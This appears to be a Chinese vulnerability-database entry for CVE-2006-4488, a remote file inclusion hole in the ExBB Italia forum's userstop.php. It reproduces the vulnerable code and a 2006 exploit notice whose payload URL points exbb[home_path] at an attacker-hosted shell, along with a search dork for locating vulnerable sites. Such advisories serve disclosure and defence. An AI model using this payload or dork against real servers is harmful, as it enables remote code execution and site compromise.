ExBB Italia 'userstop.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110913 漏洞类型 输入验证
发布时间 2006-08-29 更新时间 2006-09-15
CVE编号 CVE-2006-4488 CNNVD-ID CNNVD-200608-493
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2273
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-493
|漏洞详情
ExBBItalia是一款意大利语的论坛程序。ExBBItalia在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。ExBBItalia的modules/userstop/userstop.php脚本没有正确验证exbb[home_path]参数的输入:include($exbb['home_path'].'modules/userstop/data/userstop_conf.php');include($exbb['home_path'].'modules/userstop/language/'.$exbb['default_lang'].'/lang.php')允许攻击者通过包含本地或外部资源的任意文件执行任意代码。成功攻击要求打开了register_globals。
|漏洞EXP
#==============================================================================================
#ExBB Italian version <= v2.0 (home_path) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.exbb.altervista.org/           
#                                                                           
#Version : 2.0                                                
#                                                             
#================================================================================================
#Bug in : smodules/userstop/userstop.php
#
#Vlu Code :
#--------------------------------
#     <?
#  include($exbb['home_path'].'modules/userstop/data/userstop_conf.php');
#  include($exbb['home_path'].'modules/userstop/language/'.$exbb['default_lang'].'/lang.php')
#    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://SHELLURL.COM?
#
#DOrk : in Yahoo.it =====>         "Powered by ExBB "
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior
==================================================================================================

# milw0rm.com [2006-08-29]
|参考资料

来源:XF
名称:exbb-userstop-file-include(28624)
链接:http://xforce.iss.net/xforce/xfdb/28624
来源:BID
名称:19753
链接:http://www.securityfocus.com/bid/19753
来源:VUPEN
名称:ADV-2006-3412
链接:http://www.frsirt.com/english/advisories/2006/3412
来源:SECUNIA
名称:21681
链接:http://secunia.com/advisories/21681
来源:MILW0RM
名称:2273
链接:http://milw0rm.com/exploits/2273
来源:exbb.clans.it
链接:http://exbb.clans.it/forum/announcements.php
来源:OSVDB
名称:28251
链接:http://www.osvdb.org/28251